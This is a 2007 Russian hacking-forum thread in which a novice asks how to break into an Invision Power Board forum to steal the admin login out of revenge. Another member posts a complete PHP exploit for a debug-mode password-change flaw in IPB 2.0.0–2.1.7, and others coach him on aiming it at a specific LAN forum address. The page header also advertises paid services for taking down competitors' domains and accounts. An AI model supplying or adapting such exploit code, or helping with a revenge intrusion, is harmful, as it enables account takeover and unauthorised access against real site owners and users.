Форум АНТИЧАТ - Атака на Ipb + сниффер

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Оффтоп > Болталка
Атака на Ipb + сниффер

Страница 1 из 4

Опции темы

Поиск в этой теме

Опции просмотра

Атака на Ipb + сниффер

12.11.2007, 13:01

tick

Познающий

Регистрация: 10.11.2007

Сообщений: 36

Провел на форуме:
198117

Репутация: 5

Атака на Ipb + сниффер

Здравствуйте!
У меня парочка вопросов...

1. Подскажите сниффер для локалки чтобы взломать IPB!?

2. Есть простой способ взлома IPB?

Я не очень соображаю в хакерстве тут...но хочеться поломать форум или же узнать login и password админа в IPB !

12.11.2007, 13:12

~~it's my~~

Banned

Регистрация: 29.09.2007

Сообщений: 512

Провел на форуме:
4038468

Репутация: 1224

Отправить сообщение для it's my с помощью ICQ

хотя бы версию сказал

12.11.2007, 13:15

tick

Познающий

Регистрация: 10.11.2007

Сообщений: 36

Провел на форуме:
198117

Репутация: 5

Цитата:

Сообщение от it's my

хотя бы версию сказал

И последнию! Но главно взломать ту которую выше указал...помогите народ пожалуйста я в этом деле воще мало что знаю...но отомстить я хочу!

12.11.2007, 13:20

~~it's my~~

Banned

Регистрация: 29.09.2007

Сообщений: 512

Провел на форуме:
4038468

Репутация: 1224

может поможет

PHP код:


		
			
<?php

/*



 Debug Mode password change vulnerability

 Affects Invision Power Borard 2.0.0 to 2.1.7

 by Rapigator

 

 This works if:



 "Debug Level" is set to 3

 or

 Enable SQL Debug Mode is turned on

 

 In General Configuration of the forum software.



*/



// The forum's address up to and including 'index.php'

$site = "http://localhost/forums/index.php";



// An existing user's login name

$name = "admin";



// The new password(3-32 characters)

$pass = "1234";



// You can use a proxy...

// $proxy = "1.2.3.4:8080";







// -----------------------------

$site .= "?";

$suffix = "";

$name = urlencode($name);

$pass = urlencode($pass);

$curl = curl_init($site.'act=Reg&CODE=10');

curl_setopt($curl, CURLOPT_PROXY, $proxy);

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($curl, CURLOPT_TIMEOUT, 10);

$page = curl_exec($curl);

curl_close($curl);

if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {

    $prefix = $regs[1];

    $regid = $regs[2];

    $regcode = $regs[3];

} else {

    $suffix = "&debug=1";

    $curl = curl_init($site.'act=Reg&CODE=10'.$suffix);

    curl_setopt($curl, CURLOPT_PROXY, $proxy);

    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

    curl_setopt($curl, CURLOPT_TIMEOUT, 10);

    $page = curl_exec($curl);

    curl_close($curl);

    if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {

        $prefix = $regs[1];

        $regid = $regs[2];

        $regcode = $regs[3];

    }

}

if (!isset($regid) || !isset($regcode)) {

    echo "Error: Probably not vulnerable, or no forum found";

    exit;

}



$curl = curl_init($site.$suffix);

curl_setopt($curl, CURLOPT_PROXY, $proxy);

curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($curl, CURLOPT_POST, 1);

curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}&regid={$regid}&reg_code={$regcode}");

curl_setopt($curl, CURLOPT_TIMEOUT, 10);

$page = curl_exec($curl);

curl_close($curl);

if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {

    change_pass($regcode,$regid,$regs[1],$regs[2]);

}

if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {

    change_pass($regcode,$regid,$regs[1],$regs[2]);

}



function change_pass($regcode,$regid,$vid,$userid) {

    global $site, $proxy, $name, $pass;

    $curl = curl_init($site.$suffix);

    curl_setopt($curl, CURLOPT_PROXY, $proxy);

    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);

    curl_setopt($curl, CURLOPT_POST, 1);

    curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}&regid={$regid}&reg_code={$regcode}&pass1={$pass}&pass2={$pass}");

    curl_setopt($curl, CURLOPT_TIMEOUT, 10);

    $page = curl_exec($curl);

    curl_close($curl);

    echo "Password Changed!";

    exit;

}

?>



# milw0rm.com [2006-11-01]

12.11.2007, 13:28

tick

Познающий

Регистрация: 10.11.2007

Сообщений: 36

Провел на форуме:
198117

Репутация: 5

хм...как я понял это php файл создать и это туда сунуть? Если так т оя сделал поставил VertrigoServ создал php файл твой код вставил запустил пишет "Error: Probably not vulnerable, or no forum found" что там чтонить менять надо в php в коде или тупо вставить?

(извени за тупость если что не так...спасибо что помогаеш)

12.11.2007, 13:48

AkyHa_MaTaTa

Постоянный

Регистрация: 19.03.2007

Сообщений: 684

Провел на форуме:
3152874

Репутация: 1020

Отправить сообщение для AkyHa_MaTaTa с помощью ICQ

Как ты понимаеш варианта два:
либо ты не правильно указываешь адрес форума(он у тебя в локалке стоит, а есть ли у вас Dns сервак, если нету надо указать апи форума и путь), либо форум не "болеет" этим багом, что скорее всего, или не выполнется такое условие на серваке:
This works if:

"Debug Level" is set to 3
or
Enable SQL Debug Mode is turned on

Менять там нужно только прокси, он по дефолту выключен.

Последний раз редактировалось AkyHa_MaTaTa; 12.11.2007 в 13:51..

12.11.2007, 14:12

tick

Познающий

Регистрация: 10.11.2007

Сообщений: 36

Провел на форуме:
198117

Репутация: 5

нету там dns там из ip типо http://192.168.4.24/forum что мне делать?

12.11.2007, 14:22

~~it's my~~

Banned

Регистрация: 29.09.2007

Сообщений: 512

Провел на форуме:
4038468

Репутация: 1224

а форум из инета виден:

12.11.2007, 14:41

tick

Познающий

Регистрация: 10.11.2007

Сообщений: 36

Провел на форуме:
198117

Репутация: 5

нет!
Ну подскажите как можно взломать? Народ ну оч. надо просто хз пожалуйста...

#10

12.11.2007, 14:47

~~it's my~~

Banned

Регистрация: 29.09.2007

Сообщений: 512

Провел на форуме:
4038468

Репутация: 1224

почитай может пригодиться:
https://forum.antichat.ru/thread15678.html

а еще измени это:

Цитата:

// The forum's address up to and including 'index.php'
$site = "http://localhost/forums/index.php";

на это:

Цитата:

// The forum's address up to and including 'index.php'
$site = "http://192.168.4.24/forum/index.php";

Страница 1 из 4

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
streSS teSt Firewall'ов	Elekt	Защита ОС: вирусы, антивирусы, файрволы.	22	27.03.2009 19:43
скрипт распознавания форума	genom--	Форумы	22	31.12.2008 15:06
Сниффер...	Winc	Чаты	9	12.04.2008 14:32
Криптографический Словарь	bobob	Чужие Статьи	5	15.08.2006 00:51
Ipb 1.3 Final vs Сниффер	BlackSpider	Форумы	13	19.05.2006 14:58

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход